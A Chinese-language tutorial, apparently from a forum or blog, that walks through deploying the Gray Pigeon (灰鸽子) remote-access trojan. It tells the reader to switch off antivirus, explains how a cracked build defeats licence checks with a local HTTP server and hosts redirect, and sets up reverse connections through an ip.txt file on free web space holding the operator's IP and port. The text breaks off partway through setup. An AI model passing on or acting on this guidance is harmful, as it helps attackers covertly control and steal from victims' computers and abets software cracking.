第一,关闭杀毒软件,这点不用我说了吧~~~因为是木马,下载了之后如果杀毒软件监控开着的话肯定会被删除的。
第二,当然是下载灰鸽子的软件啦~~~上网找,有很多~~~第三,申请一个免费的主页空间,为什么要呢?因为灰鸽子是可以反弹式链接的,也就是说,服务端通过登陆你的主页的特定文件就可以主动连接到你的电脑让你控制了。
(这一点,等一下会详细解说)第二节:实战开始。
把我们刚才下来的文件解压到某个文件夹,记住,不要改文件夹的名字,后面会用到。
解压的文件里面有以下几个文件:H_Client.exe 这个是客户端的主要文件,可以配置文件,生成服务端,可以远程控制客户端。
http.exe 这个是本地http服务器,因为我们的灰鸽子是破解版的,通常正式版的灰鸽子会到官方的服务器上去验证你的软件是否正版,所以这个软件就是用来在本机子上建一个服务器,骗过软件的,从而达到破解的目的。
sunray.exe 这个里面其实也就只是一个host,它把这个网站的域名本地解析到本机,而不是解析到官方网站。
vip_2005_0113.rar 这个是验证的软件,当我们的软件解析到本机的时候它就会下载这一个到客户端,用来验证用的。
其它的文件还有config2005.asp,Operate.ini 还有四个文件夹,他们分别是(dat images login sound)我也不知道什么用的。
应该是配置用的。
第一步:在你的电脑上新建一个ip.txt的文本文件,内容如下:http://huigezi212.126.131.43:8000end其中212.126.131.43这个是我的电脑IP地址,8000是连接的端口,你可以把它写成你自己的IP地址,端口一般不要去改动,然后把这个文件上传到你刚才申请的空间,如果你的电脑是动态IP的话,那你就要经常更新这个文件的内容,然后上传到空间,它的目的是客户端上线的话就会去这个网站读取这个文件,然后主动和你取得连接。